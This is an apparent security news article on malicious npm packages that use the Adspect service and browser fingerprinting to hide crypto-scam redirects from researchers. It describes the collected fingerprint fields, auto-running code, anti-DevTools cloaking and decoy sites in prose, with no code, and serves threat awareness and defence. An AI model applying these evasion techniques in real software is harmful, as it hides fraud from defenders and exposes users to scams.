How Attackers Use Adspect and Fingerprinting to Outsmart Security Defenses

How Attackers Use Adspect and Fingerprinting to Outsmart Security Defenses

Alex Cipher's Profile Pictire Alex Cipher 7 min read

Picture this: a developer innocently installs an npm package, unaware that it’s been weaponized to outsmart even the most vigilant security teams. Attackers are now hijacking legitimate cloud services like Adspect to dynamically filter and redirect website visitors, making it nearly impossible for researchers to catch them in the act. By leveraging Adspect’s real-time visitor classification, malicious npm packages can distinguish between security professionals and everyday users, serving up decoy content to the former and scam payloads to the latter (BleepingComputer).

This isn’t just a clever trick—it’s a sophisticated blend of advanced fingerprinting, automated execution, and anti-analysis cloaking. Attackers gather granular browser and environmental data, using it to build unique visitor fingerprints and evade detection. The result? Security tools and analysts are systematically blinded, while real victims are funneled into convincing cryptocurrency scams. The recent campaign involving npm packages like integrator-filescrypt2025 and applicationooks21 highlights just how far threat actors have come in blending into legitimate development workflows and abusing trusted cloud infrastructure (BleepingComputer).

How Attackers Use Adspect and Fingerprinting to Outsmart Security Defenses

Leveraging Adspect for Dynamic Visitor Classification

Attackers behind malicious npm packages have adopted the Adspect cloud-based service to dynamically classify website visitors and tailor their attack delivery accordingly. Adspect is marketed as a legitimate cloud solution for filtering unauthorized access, blocking bots, and ensuring only genuine users reach protected content. However, threat actors have repurposed this technology to distinguish between security researchers and potential victims in real time (BleepingComputer).

When a compromised web application loads a malicious npm package, the injected JavaScript code automatically collects detailed browser and environmental data. This data is sent to the Adspect API, which evaluates the information to determine whether the visitor is a likely researcher or a regular user. The API’s decision then dictates the next stage of the attack: researchers are shown benign decoy pages, while genuine victims are redirected to scam destinations, such as fake cryptocurrency CAPTCHA sites.

This dynamic visitor classification undermines traditional security monitoring and analysis. Security teams often rely on static indicators of compromise or behavioral analysis, but Adspect’s real-time filtering means that researchers and automated scanners are systematically excluded from the malicious payload, significantly reducing the likelihood of early detection or takedown.

Advanced Fingerprinting Techniques for Target Discrimination

The malicious npm packages employ comprehensive fingerprinting to maximize the accuracy of visitor classification. The injected scripts gather a wide array of data points from the user’s browser and environment, including:

  • User agent string
  • Host and hostname of the current page
  • Referrer URL
  • Full URI and query string
  • Protocol in use
  • Browser language and encoding
  • Timestamp of the visit
  • Accepted content types

This information is assembled into a unique fingerprint for each visitor and transmitted to a threat actor-controlled proxy, which then interacts with the Adspect API (BleepingComputer). The real IP address of the visitor is also forwarded, enabling geolocation and further profiling.

By leveraging such granular fingerprinting, attackers can distinguish between human victims and automated analysis tools, as well as identify telltale signs of researcher activity (such as unusual browser configurations or VPN endpoints). This enables highly selective targeting, reducing the risk of exposure and increasing the effectiveness of their campaigns.

Automated Execution and Cloaking Mechanisms

To ensure seamless operation and evade detection, the malicious code is wrapped in an Immediately Invoked Function Expression (IIFE), which executes as soon as the web page loads—requiring no user interaction. This automation is critical for maximizing the attack’s reach, as it guarantees that every page visit is evaluated and processed without delay (BleepingComputer).

Cloaking techniques are also embedded within the code to hinder manual analysis. The script actively blocks common researcher actions such as right-clicking, opening developer tools (F12, Ctrl+U, Ctrl+Shift+I), and even reloads the page if it detects that browser DevTools are open. These anti-analysis features make it significantly more challenging for security professionals to inspect the malicious behavior in a browser context, further protecting the attacker’s infrastructure from scrutiny.

Decoy and Deceptive Content Delivery

A key component of the attack is the use of decoy content to mislead security analysts and automated scanners. If the Adspect API determines that a visitor is likely a researcher, the malicious code loads a fake but benign company site (e.g., a fabricated “Offlido” business page) instead of the actual scam content. This reduces suspicion and helps the malicious packages remain undetected in the npm ecosystem and on compromised websites (BleepingComputer).

For genuine victims, the attack flow is entirely different. After passing the Adspect classification, users are redirected to a cryptocurrency-branded CAPTCHA page (such as Ethereum or Solana), which is designed to appear legitimate. Completing the CAPTCHA triggers a deceptive sequence that opens a new tab with an Adspect-defined URL, effectively masking the true nature of the redirection and making it appear as a user-initiated action. This obfuscation is intended to bypass both browser security features and user suspicion.

Implications for Security Defenses and Detection

The integration of Adspect and sophisticated fingerprinting into malicious npm packages presents significant challenges for defenders. Traditional signature-based detection is rendered ineffective, as the malicious payload is only delivered to carefully selected targets. Automated sandbox analysis is similarly thwarted by the anti-analysis and cloaking measures, as well as the real-time visitor classification.

Furthermore, the use of a legitimate cloud service like Adspect complicates attribution and takedown efforts. Security teams must now contend with attackers who can rapidly adapt their filtering criteria and infrastructure, making it harder to block malicious traffic or identify compromised packages in the npm registry.

The scale of the threat is underscored by the number of malicious packages and the sophistication of their deployment. In the reported campaign, seven npm packages were published under the developer alias “dino_reborn” between September and November 2025, with six containing active malicious code. These packages—such as integrator-filescrypt2025, integrator-2829, and applicationooks21—were specifically engineered to exploit Adspect’s capabilities for targeted redirection and evasion (BleepingComputer).

The attackers’ ability to blend into legitimate web development workflows, combined with their use of advanced filtering and fingerprinting, signals a new level of operational security in the npm threat landscape. Security practitioners must therefore develop new detection strategies that account for dynamic content delivery, behavioral cloaking, and the abuse of third-party cloud services.

Evolving Threat Landscape and Defensive Considerations

The abuse of Adspect and fingerprinting in npm-based attacks illustrates a broader trend toward highly adaptive, context-aware malware distribution. By integrating cloud-based visitor filtering and comprehensive environmental profiling, attackers can selectively deliver payloads, minimize exposure, and evade both automated and manual analysis.

Defenders must adapt by employing advanced behavioral analytics, network traffic inspection, and proactive threat intelligence. For example, monitoring for anomalous outbound connections to Adspect or similar filtering services, combined with deeper inspection of npm package dependencies, can help identify suspicious activity. Additionally, security teams should consider implementing browser instrumentation and deception technologies to disrupt attacker fingerprinting and classification efforts.

The ongoing evolution of these techniques highlights the importance of continuous monitoring and rapid response within the software supply chain. As attackers refine their use of legitimate services and advanced evasion tactics, defenders must remain vigilant and innovative to protect users and infrastructure from increasingly sophisticated npm package threats (BleepingComputer).

Final Thoughts

The abuse of Adspect and fingerprinting in malicious npm packages marks a turning point in the software supply chain threat landscape. Attackers are no longer relying on brute force or simple obfuscation—they’re deploying context-aware, adaptive malware that can sidestep traditional detection with ease. For defenders, this means that static signatures and sandboxing are no longer enough. Instead, security teams must embrace behavioral analytics, network monitoring, and proactive threat intelligence to keep pace with these evolving tactics (BleepingComputer).

As attackers continue to exploit legitimate cloud services and refine their evasion techniques, the need for continuous monitoring and rapid response becomes even more critical. The recent npm campaign is a wake-up call: the future of cybersecurity defense lies in adaptability, collaboration, and a willingness to outthink—not just outgun—our adversaries.

References

Related Articles